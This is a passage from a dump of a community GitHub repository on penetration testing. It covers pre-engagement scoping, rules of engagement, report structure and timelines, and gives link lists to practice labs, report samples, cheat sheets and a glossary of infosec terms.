third parties about pentest results based on the findings? \n    For example, you discover a high-severity zero-day exploit as a result of a pentest. 
\n    Do you report it?\n    \n    Scope of Work\n    Professionalism\n\n##  What are the Methodology/phases of pentesting?\n\nThis question could have different answers, depending on the hiring manager having real pentesting experience\nor just passing a few knowledge-based certification exams.\n\n    If you go by the penetration testing execution standard (PTES), there are seven \n    phases of pentesting, which are pre-engagement, intelligence gathering, threat \n    modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.\n\n    If you take a popular knowledge-based certification exam, the phases are \n    reconnaissance, scanning and enumeration, gaining access, maintaining access, and \n    covering tracks\n\n## UNDERSTAND THE TARGET:\n  \n    Tester: You need to work to understand the target to design a better test\n    Testees: You need to understand yourself so you can steer the test and design\n    Recipients: What do you want from the test? What kind of output?\n\n      Best Advise : NEVER ASSUME - Ask the dumb question\n      eg :\n        “I can guess, but I don’t like to be wrong, so can\n        you describe for me what data or process if lost,\n        destroyed, stolen, or leaked would cause the\n        greatest damage to your organization?”\n\n## Understanding will help you tailor the test and test results\n\n    Why is the test being done? Compliance? 
Improved posture?\n    Who is the size/class of yout network?\n    What are the security goals and goal of pentesting?\n    How many Ip's the nerwork have?\n    How many web pages and input form the application have?\n    What are the *biggest risks* to the org?\n    You need to identify the goals of pentesting and BUSINESS RISK of client.\n \n ![business risk](https://user-images.githubusercontent.com/25515871/177207195-029b84f2-7fdb-4b55-b36f-4c1af8514bf5.png)\n\n## WHAT IS NEEDED TO TEST?\nOrganizational goals will define the test.\nSometimes the test type is the first point, sometimes it is scope. \nIt all depends on the goals and background information.\n   \n   1. Scope\n   2. Types of tests\n    And  Rules of engagement\n\n### TEST TYPES\n    \n    Network pentesting (Internal Network & External Network also include by bypassing IDS & IBS)\n    Assumed Breach\n    Egress & C2 testing\n    Red Team\n    Purple Team\n    Phishing\n    Social Engineering\n    *Web App & API testing\n    *Mobile App pen testing\n    cloud penitration testing\n    Wireless pen testing\n    Hardware/physical pentesting\n    Many others...\n    \n## SCOPE :\n\n    What is in scope? – This determines time (and cost)\n    What is out of scope?\n      Yes, this is the same question, but ask it too and \n      you will get extra information\n      Why is it out of scope?\n    What is owned by someone else?\n   \n## RULES OF ENGAGMENT\n\n    What can *testers do* without additional permission?\n    What should *testers not do* without additional permission?\n    Usually pretty simple, simple enough to be a simple list\n      Pre-approve engagement potentially are more dangerous attacks, such as password guessing.\n      All other \"riskier/ENGAGMENT\" things need approval.\n      \n  ### CAN THINGS GO WRONG? - answer is YES.\n  \n       Most common Systems crash on their own and there is an increased risk with atypical traffic.\n          Does it happen all the time? 
No\n          Can it? Of course\n       Never guarantee 100% uptime, because no SLAs are 100%\n       And learn from mistakes (redsiege.com/askus)       \n \n ### OTHER THINGS TO PLAN (in case you have a team of pentesters or run a company)\n      \n      Contact numbers for testers and target, including backups\n      Secure communication methods\n      Regular discussion times on longer tests\n      For longer tests, create a follow-up template to keep up with clients.\n      Advice for orgs: always ROTATE TESTING. \n      If you never rotate, you will go out of business almost immediately.\n      \n      For the individual pentester:\n      Don't be afraid to approach orgs for testing.\n      Orgs may be looking for different testers after a certain time.\n\n\n## What is the content of a well-written pentest report?\nThe typical penetration test report is structured into the following sections:\n\n    1. Cover page and vulnerability title\n    2. Info (table of contents)\n    3. Executive summary, technical report summary\n    \n    -   An executive summary should be one page or less and should highlight exciting pieces of the report's findings.\n        Think of this part as marketing, and you need to get the stakeholder to buy what you are selling \n        so that they finish reading the full report.\n    \n    4. Mode of operating (methodology; also include the OWASP Risk Rating)\n    5. A copy of the original test scope of work signed as part of the contract. \n    -   (Company checklist as per the client's requirements, or the company's/individual's own checklist)\n    \n    6. Findings summary \n    -   A summary of the vulnerabilities that you found. A simple pie-chart graphic works well for this if you \n        categorize the vulnerabilities.\n    7. Details of the testing team and the tools that were used in the engagement\n    8. Findings (include vulnerability title, vulnerability type, PoC - steps to reproduce, screenshots, links, impact, CVSS score, suggested fix, etc.)\n    9. 
Recommendations (final thoughts & tips)\n    10. Appendix (appendices)\n    \n    Revisions (change history after submitting the report to the client)\n    \n## If you are bringing in the clients for the organization\n    \n    0. As a tester, you need to understand that attackers have a near-infinite amount of time.\n       No one is going to pay an infinite amount of money*\n       So set a realistic duration to get optimal results.\n    1. Clients may just ask you to conduct a pentest, not know all the technical details, and still expect a good test.\n       Your job is to explain the test types and understand their requirements by asking the right questions, not to shame them.\n    2. Testers need to be available for outages, questions, or external compromise.\n    3. Testers must know the client's procurement process and their holiday schedule!\n    4. If the target doesn't improve their security posture, you have been a waste of time.\n    \n### IF YOU ARE THE REPORT RECIPIENT\n    Ask for what you want ahead of time \n    e.g. some orgs want data in a spreadsheet or CSV, or may ask for an executive report or a developer report, etc.\n    Does the sample report have the info you want or need?\n    Use the pen testers! 
Set up a debrief call to go through the report if you need it!\n    \n    \n## Reference:\n   ### [Pre-engagement Interactions](https://pentest-standard.readthedocs.io/en/latest/preengagement_interactions.html)\n   ### Executive-Level Reporting\n\n            Business Impact\n            Customization\n            Talking to the business\n            Affect bottom line\n            Strategic Roadmap\n            Maturity model\n            Appendix with terms for risk rating\n    \n    \n   ### Technical Reporting\n\n            Identify systemic issues and technical root cause analysis\n            Maturity Model\n            Technical Findings\n\n            Description\n            Screenshots\n            Ensure all PII is correctly redacted\n            Request/Response captures\n            PoC examples\n            Ensure PoC code provides benign validation of the flaw\n\n            Reproducible Results\n\n            Test Cases\n            Fault triggers\n\n            Incident response and monitoring capabilities\n\n            Intelligence gathering\n            Reverse IDS\n            Pentest Metrics\n            Vuln. Analysis\n            Exploitation\n            Post-exploitation\n            Residual effects (notifications to 3rd parties, internally, LE, etc…)\n\n            Common elements\n\n            Methodology\n            Objective(s)\n            Scope\n            Summary of findings\n            Appendix with terms for risk rating\n            \n ## How do you measure the results of a pentest?\n        \n        It depends on what the organization is looking to measure. 
Common things to track are the criticality of findings,\n        how many issues that surfaced in the pentest actually get fixed, what types of vulnerabilities and exploits are \n        being discovered, and which new issues have been identified since the last pentest.\n        \n## How often should organizations have an external pentest performed?\n\n        This answer depends on their compliance requirements, but generally, this should happen at least once a year\n        and preferably on a quarterly basis. One thing you will notice when you're working as a pentester is that \n        many companies will not fix any of the issues you report, so you might come back a year later and identify the \n        same issues.\n\n   ### A three-part video series on pen testing by Tim Medin (@timmedin)\n[PART 1: THE START](https://youtu.be/23F8QKTu86U) [Pentest process.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9042034/Pentest.process.pdf)\n\n[PART 2: THE METHOD](https://redsiege.com/pentestprocess2) [Slides](http://www.redsiege.com/wp-content/uploads/2021/03/20210309-PEN-TEST-PROCESS-P2-THE-METHOD.pdf)\n\n[PART 3: THE REPORT](https://www.youtube.com/watch?v=oyJ0atDagco) [Slides](https://redsiege.com/pentestprocess3)\n\n"
  },
  {
    "path": "PentestingReports/Readme.md",
    "content": "Note: The contents of **RESETHACKER** are to help the community, and all\nthe content belongs to the respective authors and Team RESETHACKER.\n\n1. [Pentesting Pre-Engagement Advice](#Pentesting-Pre-Engagements-Advice)\n2. [Pentesting NDA & SaaS Agreement form](#Saas-Agrement-form)\n3. [Pentesting Report Samples](#Pentesting-Report-samples)\n4. [Pentesting Report videos - How to write a pentest report?](#Pentesting-Videoes-How-to-write-pentest-report?)\n5. [Pentesting Timelines](#Pentesting-timelines)\n6. [Penetration quotation](#Penetration-quotation)\n\n\n## [Pentesting Pre-Engagement Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/PreEngagement.md)\n\n        ✅ Pre-engagement: \n                - Help yourself get your 1st pentesting client and prepare for the client meeting\n\n        ✅ UNDERSTAND THE TARGET:\n        ✅ Understanding will help you tailor the test and test results\n        ✅ WHAT IS NEEDED TO TEST?\n                - TEST TYPES\n        ✅ SCOPE:\n        ✅ RULES OF ENGAGEMENT\n                - CAN THINGS GO WRONG? 
- The answer is YES.\n                - OTHER THINGS TO PLAN (in case you have a team of pentesters or run a company)\n        ✅ LEGAL REQUIREMENTS FOR PENTESTING:\n        ✅ Pentest report structure \n        ✅ If you are bringing in the clients for the organization\n                - IF YOU ARE THE REPORT RECIPIENT\n        ✅ Reference: A three-part video series on pen testing by Tim Medin (@timmedin)\n\n## Pentesting NDA & SaaS Agreement form \n\n- [NDA & SaaS Agreements form](https://drive.google.com/drive/folders/1dvUVNM5WnV9sFWL0BVHvJUNP44_bqhRj?usp=sharing)\n- [Pentesting Agreements form](https://drive.google.com/file/d/1qA2_K5mYqYwhzKYnAJ7WPsktZ9kWlQEI/view?usp=sharing)\n\n\n## Pentesting Report Samples:\n\nIndex | Pentesting Report Sample\n---|---\n**1** | [By Resethacker (Vikram)](/.pdfs/FinalV1.pdf)\n**2** | [Public Pentesting Reports by juliocesarfort](https://github.com/juliocesarfort/public-pentesting-reports)\n**3** | [Web Application Pentesting report sample by SecurityBoat (Ninad Mathpati)](https://ninadmathpati.com/Web%20Application%20Pen%20Test%20Report.pdf)\n**4** | [Public Pentesting Reports by pentestreports.com](https://pentestreports.com/reports/)\n\n## Pentesting Videos - How to write a pentest report?\n\nIndex | Pentesting Videos\n---|---\n**1** | [Penetration testing - How to write a pentest report](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/pentestingvideos.md)\n\n## Pentesting Timelines\n        \n        Most pentesting people ask this question: \"What time investment do you estimate for a penetration test?\"\n\n        The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements. \n        Usually, the time needed ranges from a few days to several weeks. 
One goal of the preliminary meeting is to get enough information about \n        the systems to be tested to estimate the optimal length/time for the penetration test. \n\nAuthor | Pentesting Timelines\n-- | --\n**1** securitymetrics | [Penetration Testing Timeline](https://www.securitymetrics.com/content/dam/securitymetrics/PDF-files/Penetration_Testing_Timeline_Checklist.pdf)\n\n  #### Penetration Testing Timeline for enterprises\n              ✅1. SCHEDULING\n                    2-4 Months Before Penetration Test\n                \n              ✅2. TESTING PREPARATION\n                    5 Weeks Before Penetration Test\n                \n              ✅3. AUTOMATED/MANUAL TESTING\n                    During Penetration Test\n                \n              ✅4. REPORTING\n                    0-6 Weeks After Penetration Test\n\n              ✅5. REMEDIATION\n                    0-3 Months After Penetration Test\n                \n              ✅6. RETESTING\n                    0-3 Months After Penetration Test\n                \n              ✅7. AFTER RETESTING\n                    Ongoing\n\n\n\n## Pentesting Quotation\nAuthor | Pen testing Quotation\n-- | --\n**1** Updating Soon | [Penetration Quotation - Updating Soon]()\n\n"
  },
  {
    "path": "PentestingReports/pentestingvideos.md",
    "content": "Index  |  Pentest Videos\n-- | --\n**1** | [Pentest Reporting and Best Practices - HackerOne](https://www.youtube.com/watch?v=6QIrXgPGJhM)\n**2** | [Penetration Testing Reporting - Lord Saibat](https://www.youtube.com/watch?v=6SqAXl24QaM)\n**3** | [Writing a Pentest Report - The Cyber Mentor](https://youtu.be/EOoBAq6z4Zk)\n**4** | [Tips for How to Create a Pen (Penetration) Testing Report - Download Report Sample](https://pentestreports.com/video/nez4sfjjwvu)\n**5** | [OSCP Report Made Easy - Michael LaSalvia](https://www.youtube.com/watch?v=O9JWmF3Bgis)\n**6** | [OSCP - How to Write the Report - Conda](https://www.youtube.com/watch?v=Ohm0LhFFwVA)\n**7** | [Pen Test Process: The Report - Red Siege](https://www.youtube.com/watch?v=oyJ0atDagco)\n**8** | [Public Penetration Test Reports - Learning Resource - LiveOverflow](https://www.youtube.com/watch?v=qNLMuls2BBA)\n**9** | [Writing Reports: The Overlooked Pen Testing Skill - Pen Test HackFest Summit 2021 - SANS Offensive Operations](https://www.youtube.com/watch?v=r-6LBjlM14Y)\n**10** | [Why a Pentesting Report is extremely important? - EC-Council](https://www.youtube.com/watch?v=tbuU0uzU-oI)\n**11** | [Pentest Report Writing Made Simple (No MS Office) - Zanidd](https://www.youtube.com/watch?v=u_-b_JIqPbs)\n\n"
  },
  {
    "path": "Pentesting_for_Researchers/PTplatform.md",
    "content": "## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩‍💻👀\n\nIndex | Websites\n-- | --\n- | [SANS Challenger](https://www.holidayhackchallenge.com/2021/)\n- | [SmashTheStack](http://www.smashthestack.org/wargames.html)\n- | [The Cryptopals Crypto Challenges](https://cryptopals.com)\n- | [Try Hack Me](https://tryhackme.com)\n- | [Vulnhub](https://vulnhub.com)\n- | [W3Challs](https://w3challs.com)\n- | [Academy Hackaflag BR](https://hackaflag.com.br)\n- | [Attack-Defense](https://attackdefense.com)\n- | [Alert to win](https://alf.nu/alert1)\n- | [CTF Komodo Security](https://ctf.komodosec.com)\n- | [CMD Challenge](https://cmdchallenge.com)\n- | [Exploitation Education](https://exploit.education)\n- | [Google CTF](https://lnkd.in/e46drbz8)\n- | [HackTheBox](https://hackthebox.com)\n- | [Hackthis](https://hackthis.co.uk)\n- | [Hacksplaining](https://lnkd.in/eAB5CSTA)\n- | [Hacker101](https://ctf.hacker101.com)\n- | [Hacker Security](https://lnkd.in/ex7R-C-e)\n- | [Hacking-Lab](https://hacking-lab.com)\n- | [HSTRIKE](https://hstrike.com)\n- | [ImmersiveLabs](https://immersivelabs.com)\n- | [NewbieContest](https://lnkd.in/ewBk6fU5)\n- | [OverTheWire](http://overthewire.org)\n- | [Practical Pentest Labs](https://lnkd.in/esq9Yuv5)\n- | [Pentestlab](https://pentesterlab.com)\n- | [Penetration Testing Practice Labs](https://lnkd.in/e6wVANYd)\n- | [PentestIT LAB](https://lab.pentestit.ru)\n- | [PicoCTF](https://picoctf.com)\n- | [PWNABLE](https://lnkd.in/eMEwBJzn)\n- | [Root-Me](https://root-me.org)\n- | [Root in Jail](http://rootinjail.com)\n- | [WeChall](http://wechall.net)\n- | [Zenk-Security](https://lnkd.in/ewJ5rNx2)\n"
  },
  {
    "path": "Pentesting_for_Researchers/Pentest-Reports.md",
    "content": "[𝗙𝗥𝗘𝗘 𝗥𝗘𝗦𝗢𝗨𝗥𝗖𝗘𝗦 / 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧] - By @Gabrielle_BGB\n\nWant to upgrade your reporting skills?\nCheck out these resources\n\n👉 𝗦𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 𝗼𝗳 𝗮 𝗽𝗲𝗻𝘁𝗲𝘀𝘁 𝗿𝗲𝗽𝗼𝗿𝘁\n🌟 My article on how to write a pentest report:\nhttps://lnkd.in/eH92fT8Q\n\n👉 𝗛𝗼𝘄 𝘁𝗼 𝘁𝗮𝗸𝗲 𝗻𝗼𝘁𝗲𝘀\n🌟 Cherry Tree\nhttps://lnkd.in/eqTjHYKi\n🌟 Joplin\nhttps://joplinapp.org/\n🌟 Keepnote\nhttp://keepnote.org/\n\n👉 𝗧𝗶𝗽𝘀 𝗳𝗿𝗼𝗺 𝗘𝘅𝗽𝗲𝗿𝘁𝘀\n🌟 Writing Tips for IT Professionals by Lenny Zeltser\nhttps://lnkd.in/eMSiEpeZ\n🌟 How to write a Penetration Testing Report by HackerSploit\nhttps://lnkd.in/ekSu5vAp\n\n👉 𝗔𝘂𝘁𝗼𝗺𝗮𝘁𝗶𝗼𝗻\n🌟 Blackstone project by micro-joan\nhttps://lnkd.in/eBSy58Ur\n🌟 Pentext by Radically Open Security\nhttps://lnkd.in/eNPhHHdx\n\n👉 𝗘𝘅𝗮𝗺𝗽𝗹𝗲𝘀 𝗼𝗳 𝗿𝗲𝗽𝗼𝗿𝘁𝘀\n🌟 A list of public pentest reports by juliocesarfort\nhttps://lnkd.in/ebeJwVXQ\n🌟 A list of bug bounty writeups on Pentester Land\nhttps://lnkd.in/e4G9xB9A \n"
  },
  {
    "path": "Pentesting_for_Researchers/Readme.md",
    "content": "# PEN TESTERS (Under Development)\n1. Companies have a PEN TESTERS team to conduct pentesting.\n2. Companies HIRING PEN TEST SERVICES - on an hourly or project basis.\n\n- A list of [Privacy &amp; Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources)\n\n# Pentesting Ebook overview:\n\nAuthor Pentesting | Title\n-- | --\n**1** | [Practical Hardware Pentesting](https://t.me/freedomf0x/16886)\n**2** | [Pentesting Industrial Control Systems](https://t.me/freedomf0x/16889)\n**3** | [Network Pentesting](https://t.me/freedomf0x/12884)\n**4** | [Web pentesting 1](https://t.me/freedomf0x/16879) & [Web pentesting 2](https://t.me/freedomf0x/14577)\n**5** | [Pentesting Azure](https://t.me/freedomf0x/16891), [Windows server](https://t.me/freedomf0x/15382), [PowerShell, and Active Directory](https://t.me/freedomf0x/12882)\n\n- Mobile Application Pentesting:\n   - [OWASP Mobile Application Security](https://mas.owasp.org/)\n   - [eLearnSecurity Mobile Application Penetration Testing (eMAPT) Notes ANDROID by Joas](https://drive.google.com/file/d/1vDPzDhGZiRXWPGZ4Yk2grBzA0ouE2KMw/view)\n   - [Mobile Pentesting Roadmap](https://medium.com/@rezaduty/mobile-penetration-tester-roadmap-f2ec9bd68dcf)\n   - [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)\n   - [TDI 2022 - Android Application Hacking Talk](https://csbygb.gitbook.io/pentips/talks/android-app)\n\n# Pentesting for Researchers \n\nAuthor Pentesting | Title\n-- | --\n**1** Vulnerabilityassessment | [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)\n**2** Elijah | [Pentesting Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)\n**3** Chryzsh | [Beginner-Friendly Pentesting](https://chryzsh.gitbooks.io/pentestbook/content/)\n**4** Pentesting Standard | [High Level Pentesting Standard](http://www.pentest-standard.org/index.php/Main_Page)\n**5** Phases of 
Infrastructure Pentest | [All the phases of Infrastructure Pentest](https://bitvijays.github.io/index.html)\n**6** Sdcampbell | [Internal Network Penetration Test Playbook](https://github.com/sdcampbell/Internal-Pentest-Playbook)\n**7** Red team/Bug Bounty Security References | [by s0cm0nkey](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/web-app-hacking)\n**8** enaqx | [Awesome Pentest](https://github.com/enaqx/awesome-pentest)\n**9** Gabrielle_BGB  | [Pentest Tips](https://github.com/CSbyGB/pentips)\n**10** Wordlists | [All Wordlists](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists.md)\n\nAuthor | Pentesting Checklist\n-- | --\n**1** | [Pentesting Checklist](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/PentestingChecklist)\n**2** | [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)\n\nAuthor | Pentesting Mindmap\n-- | --\n**1** | [Internal-Network-Pentest-MindMap](https://github.com/sdcampbell/Internal-Network-Pentest-MindMap)\n\nAuthor | Pentesting Cheatsheet\n-- | --\n**1** | [Pentesting Cheatsheet](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/cheetsheets)\n**2** | [hausec - pentesting cheatsheet](https://hausec.com/pentesting-cheatsheet/)\n**3** | [ired - offensive-security-cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)\n**4** | [anhtai - beginner-friendly pentesting cheatsheet](https://anhtai.me/pentesting-cheatsheet/)\n**5** | [coreb1t - collection of cheat sheets useful for pentesting](https://github.com/coreb1t/awesome-pentest-cheat-sheets)\n**6** | [Randomkeystrokes - Wifi Pentesting Command Cheatsheet](https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/)\n**7** | [NEED TO UPDATE - pentesting-with-powershell-in-six-steps](https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/)\n\n\nAuthor | Pentesting Tools\n-- | --\n**1** 
S3cur3Th1sSh1t | [Pen Testing Tools](https://github.com/S3cur3Th1sSh1t/Pentest-Tools)\n\nAuthor | Pentesting Labs\n-- | --\n**1** | [Practice Labs for Pentesting](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Pentesting_for_Researchers/PTplatform.md)\n\n## Tools\n- [Oh-My-Zsh theme for pentesters, which includes the date, time, and IP address for pentest logging.](https://github.com/sdcampbell/lpha3cho-Oh-My-Zsh-theme-for-pentesters)\n\n## ASK questions related to pentesting\n\nIndex | Community calls\n-- | --\n**1** | [Wednesday Offensive - Red Siege]\n\n30 minutes of conversation with people around the industry with Tim Medin and the Red Siege team. Open to everyone, questions welcome!\nJoin us Wednesdays in an open-conversation live video chat format. No slides, just talk! Topics will vary depending on guests, but conversations are open to everyone. You only need to register the first time and you're set for all future Wednesday Offensive conversations. \n\n[Zoom meeting ID, passcode & link: 842 7796 4949, 957717](https://us02web.zoom.us/w/84277964949?tk=c9Sq_ZUmgkIXWjmc9IFvz5JElMlmba3ll1gnawypC-8.DQMAAAATn1uwlRZTVWhXZy1HZVFwQ1k2VHRPMVNMU1FRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&pwd=LTWU2D9UAWMiSBE2gNF8yk8k8S95SJ9bAT)\n\n      Aug 10, 2022 12:30 PM\n\n![web pentesting understand](https://user-images.githubusercontent.com/25515871/179118116-d376b928-f564-435b-a8c5-f38115aeb9da.png)\n"
  },
  {
    "path": "README.md",
    "content": "## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Resources\" /> </p>\n\n\nHey folks! The ResetHacker community is open for contributors, and everyone is welcome to contribute here. \n\n\n## Contributing - [Must Read me :)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CONTRIBUTING.md)\n\nAs of writing, there are no code contributors to the main project. \nHowever, you can contribute learning resources, including conferences, jobs, writeups, tutorials, the bug bounty helpdesk, the pentesting helpdesk, how to get started, reviews of courses, etc., or modify the README.md or any other repository.\n\n**We're inviting community contributors for the early-stage cybersecurity HELPDESK. This project is not limited to bug bounty or pentesting. Anyone is welcome to contribute.**\n\n## Rules are simple to crowdsource our learning.\n\n- Pick a topic from your domain, ADD a domain, or choose new topics that you find helpful for the community.\n\n- If you still have a question, feel free to create an issue on GitHub; if you want to contribute to this project as a member of the team, 
DM me on Telegram @Attr1b or email me at resethackerofficial@gmail.com\n\n---\n\nIndex | Topics\n---|---\n**0** | [Weekly InfoSec update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)\n**1** | [CVE PoCs and exploits that matter](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n**2** | [BugBounty-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n**3** | [Cybersecurity Jobs-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting/blob/main/CyberSecurityJobs/Readme.md)\n**4** | [CyberSecurity Conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**5** | [Pentesting pre-engagement, NDA form, report samples, timeline etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/PentestingReports)\n**6** | [Pentesting for Researchers](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/Pentesting_for_Researchers)\n\n\n- **Contributors** 💪😎\n\t>Thanks a lot for spending your time helping! Keep rocking 🍻\n\t<!-- readme: contributors -start -->\n\t<table>\n\t<a href=\"https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/graphs/contributors\">\n  \t<img src=\"https://contrib.rocks/image?repo=RESETHACKER-COMMUNITY/Pentesting-Bugbounty\" />\n\t</a>\n\n\t</table>\n<p>\nNote: The contents of **RESETHACKER** are to help the community, and all\nthe content belongs to the respective authors and RESETHACKER.\n</p>\n\n# Catalog for Enterprises\n\t\t\nIndex | Topics (Updating Soon)\n---|---\n**1.** | [Who conducts VAPT?]\n**2.** | [Benefit of VAPT?] 
\n**3.** | [Purpose of VAPT?]\n**4.** | [Vulnerability severity & impact analysis.]\n**5.** | [Difference between VA & PT?]\n\n# OWASP top 10 (2017 - 2021)\n\n<img width=\"700\" alt=\"OWASP top 10 mapping\" src=\"https://user-images.githubusercontent.com/25515871/178655070-37eafa42-c714-4ef8-aa5e-eac03c1e776a.png\">\n\n\n# Table of Contents for Community 📚 \n\n- [Introduction](#introduction)\n  - [What is penetration testing?](#what-is-penetration-testing)\n  - [Want to become a penetration tester?](#want-to-become-a-penetration-tester)\n- [Some vocabulary](#some-vocabulary)\n- [Difference between hacking and ethical hacking](#difference-between-hacking-and-ethical-hacking)\n- [Languages](#languages)\n- [Content Management Systems](#content-management-systems)\n- [Basic steps of pen testing](#basic-steps-of-pen-testing)\n- [Tools by category](#tools-by-category)\n  - [:male_detective: Information Gathering](#male_detective-information-gathering)\n  - [:lock: Password Attacks](#lock-password-attacks)\n    - [:memo: Wordlists](#memo-wordlists)\n  - [:globe_with_meridians: Wireless Testing](#globe_with_meridians-wireless-testing)\n  - [:wrench: Exploitation Tools](#wrench-exploitation-tools)\n  - [:busts_in_silhouette: Sniffing & Spoofing](#busts_in_silhouette-sniffing--spoofing)\n  - [:rocket: Web Hacking](#rocket-web-hacking)\n  - [:tada: Post Exploitation](#tada-post-exploitation)\n  - [:package: Frameworks](#package-frameworks)\n  - [Books / Manuals](#books--manuals)\n  - [Discussions](#discussions)\n  - [Security Advisories](#security-advisories)\n- [Must check out: awesome resources]\n- [Additional resources](#additional-resources)\n- [License](#license)\n\n(TOC made with [nGitHubTOC](https://imthenachoman.github.io/nGitHubTOC/))\n\n# Introduction\n\n## What is penetration testing?\n\nPenetration testing is a type of security testing that is used to test the security of an application. 
It is conducted to find security risks which might be present in a system.\n\nIf a system is not secure, then an attacker may be able to disrupt or take unauthorized control of that system. A security risk is normally an accidental error that occurs while developing and implementing software, for example configuration errors, design errors, and software bugs. [Learn more](https://www.tutorialspoint.com/penetration_testing/penetration_testing_quick_guide.htm)\n\n## Want to become a penetration tester?\n\nKnowing about risks on the internet and how they can be prevented is very useful, especially as a developer. Web hacking and penetration testing are the v2.0 of self-defense! But is knowing about tools and how to use them really all you need to become a pen tester? Surely not. A real penetration tester must be able to proceed rigorously and detect the weaknesses of an application. They must be able to identify the technology behind it and test every single door that might be open to hackers.\n\nThis repository aims first to establish a reflection method on penetration testing and explain how to proceed to secure an application, and secondly to gather all kinds of tools and resources pen testers need. **Be sure to know the basics of programming languages and internet security before learning pen testing.**\n\nAlso, it is important to inform yourself about the law and what you are allowed to do or not. Depending on your country, the computer laws are not the same. First, check laws about privacy and surveillance: [Nine eyes countries](https://en.wikipedia.org/wiki/Five_Eyes#Other_international_cooperatives), [Five eyes](https://en.wikipedia.org/wiki/Five_Eyes) and Fourteen Eyes. Always check if what you're doing is legal. 
Even when it's not offensive, information gathering can also be illegal!\n\n([Table of Contents](#table-of-contents))\n\n# Some popular domains in cybersecurity\n\n**Infosec**: Information security, which is the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information. The information or data may take any form, e.g. electronic or physical. Infosec can also refer to a person who practices information security. [Wikipedia](https://en.wikipedia.org/wiki/Information_security)\n\n**Opsec**: Operations security, which is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information. [Wikipedia](https://en.wikipedia.org/wiki/Operations_security)\n\n**Black/grey/white hat hacker**: Someone who uses bugs or exploits to break into systems or applications. The goal and the method differ depending on whether they're a black, grey or white hat hacker. A black hat is just someone malicious who does not wait for permission to break into a system or application. A white hat is *usually* a security researcher who practices ethical hacking. A grey hat sits in the middle of these two kinds of hackers; they might be malicious if it benefits them (data breach, money, whistleblowing ...).\n\n**Red team**: According to Wikipedia, a red team or the red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role or point of view. It is particularly effective in organizations with strong cultures and fixed ways of approaching problems. 
The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine or publications about Red Teaming in the military exist. In infosec exercises, Red teamers are playing the role of attackers. [Wikipedia](https://en.wikipedia.org/wiki/Red_team)\n\n**Blue team**: A blue team is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. As a result, blue teams were developed to design defensive measures against red team activities. In infosec exercises, Blue teamers are playing the role of defenders. [Wikipedia](https://en.wikipedia.org/wiki/Blue_team_(computer_security))\n\n**Penetration tester**: An ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.\n\n**Security researcher**: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs or vulnerabilities. They can work for a company as a security consultant and are most likely a Blue teamer.\n\n**Reverse engineering**: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. Similar to scientific research, the only difference being that scientific research is about a natural phenomenon. [Wikipedia](https://en.wikipedia.org/wiki/Reverse_engineering)\n\n**Social engineering**: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information. 
